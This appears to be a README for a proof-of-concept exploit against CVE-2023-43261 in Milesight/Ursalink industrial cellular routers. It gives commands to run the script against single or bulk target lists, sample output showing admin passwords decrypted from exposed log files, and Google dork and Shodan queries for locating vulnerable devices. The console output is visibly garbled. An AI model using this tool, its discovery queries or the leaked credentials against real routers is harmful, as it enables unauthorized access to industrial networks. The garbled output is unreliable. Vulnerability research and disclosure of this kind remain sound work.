

• Severity: 7.3/10 - High

A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.

## Usage

Run the script with the following command, replacing <URL> with your target URL.

```
foo@bar:~$ python3 CVE-2023-43261.py <URL>
```

Run the script with the following command to process a list of URLs in the file:

```
foo@bar:~$ python3 CVE-2023-43261.py -f list_ur:
```

```
bipin-VirtualBox:~/ursalink$ python3 ursalink3.py
Example: python3 ursalink3.py https://example: python3 ursalink3.py fourls.txt

Example: python3 ursalink3.py fourls.txt

bipin@bipin-VirtualBox:~/ursalink$ python3 ursalink3.py http://

8080/lang/log/httpd.log
8080/lang/log/httpd.log
        Data retrieval successful for: http:/
Found 1 unique credentials for: http:/
2:8080/login.html
        Login page: http:// 2:8080/login.html
Extracting and decrypting credentials for: http:// 2:8080
  +] Unique Credentials:
         Credential 1:
               - Username: admin
                lePassword:∨svs114871d
  ipin@bipin-VirtualBox:~/ursalink$ python3 ursalink3.pv -f ursalink_vuln_list.txt
        Initiating data retrieval for: https:// :443/lang/log/httpd.log
Data retrieval successful for: https:// :443/lang/log/httpd.log
         Found(1 unique credentials for: https:/
                                                                                                   :443/login.html
        Logins page: https://
         Extracting and decrypting credentials for: https://
  +] Unique Credentials:
         Credential 1:
               - Username: admin
               _-P Password: \ocppassword
         Initiating data retrieval for: https://
                                                                                                                                                            443/lang/log/httpd.log
                                                                                                                                                            443/lang/log/httpd.log
         Data retrieval succession of the second of t
                                                                                                                                                            :443
        +] Unique Credentials:
         Credential 1:
              - Username: admin
                  Password: ocppassword
         Credential 2:
               - Username: admin
                  Password: password
        Initiating data retrieval for: https://
Data retrieval successful for: https://
                                                                                                                                                        :443/lang/log/httpd.log
:443/lang/log/httpd.log
        Data retrieval successful of https://
Found 1 unique credentials for: https://
:443/login.html
        Extracting and decrypting credentials for: https://linique Credentials:
         Credential 1:
                - Password: ocppassword
        Initiating data retrieval for: https:// 443/lang/log/httpd.log
Data retrieval successful for: https:// 443/lang/log/httpd.log
Found 9 unique credentials for: https:// ):443
Login page: https:// ):443/login.html
         Login page: https:// :443/login.html
Extracting and decrypting credentials for: https://
         Unique Credentials:
         Credential 1:
                - Username: admin
```

## **Google Dorks**

- "/lang/log/system" ext:log
- "URSALINK" "English" "Login"

## **Shodan Search Query**

http.html:rt title

## References

- Security Advisory: <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43261">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43261</a>
- 2. Writeup: <a href="https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf">https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf</a>

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The PoC script provided in this repository is intended for educational and research purposes only. It is designed to demonstrate the existence of a vulnerability and assist in understanding potential security risks.

Usage of this script for any unauthorized activities, including but not limited to unauthorized access, unauthorized testing, or any other form of misuse, is strictly prohibited.

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